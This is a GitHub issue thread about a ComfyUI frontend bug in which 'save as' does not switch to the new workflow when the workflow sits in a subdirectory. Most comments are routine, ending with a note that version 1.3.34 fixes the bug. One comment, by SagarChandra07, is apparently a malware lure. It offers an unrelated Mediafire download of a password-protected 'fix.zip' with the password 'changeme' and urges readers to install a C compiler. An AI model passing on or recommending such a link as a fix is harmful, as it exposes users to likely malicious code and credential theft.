### ISSUE TITLE
[Bug]: For workflows in subdirectory, the workflow for the current page is not switched after "save as".

### ISSUE THREAD

**Issue by amimi818** [Comfy-Org/ComfyUI_frontend#1040]
### Frontend Version

ComfyUl_frontend v1.3.3

### Expected Behavior

After "save as" is performed, the current workflow on the comfyui page should be switched to the new workflow of "save as".

### Actual Behavior

 For workflows in subdirectory, the workflow for the current page is not switched after "save as".

![Snipaste_2024-09-29_09-44-00](https://github.com/user-attachments/assets/df8180a9-9572-4804-8429-b91fd42dd23e)

after "save as"  (still the same workflow as before “save as”)
![Snipaste_2024-09-29_09-42-59](https://github.com/user-attachments/assets/73bec588-4346-4b36-b5e9-2a0e6db7e9a6)

### Steps to Reproduce

“save as”the workflow in subdirectory.

### Debug Logs

```powershell
no
```

### Browser Logs

no

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by lldacing** [comment]
How to create a subfolder. I can't find a place to create it online.

**Comment by amimi818** [comment]
> How to create a subfolder. I can't find a place to create it online.

through the File Explorer or Finder ;)

**Comment by amimi818** [comment]
@huchenlei, Is this problem difficult to solve?

**Comment by LukeG89** [comment]
@amimi818 This bug seems solved in 1.3.34!
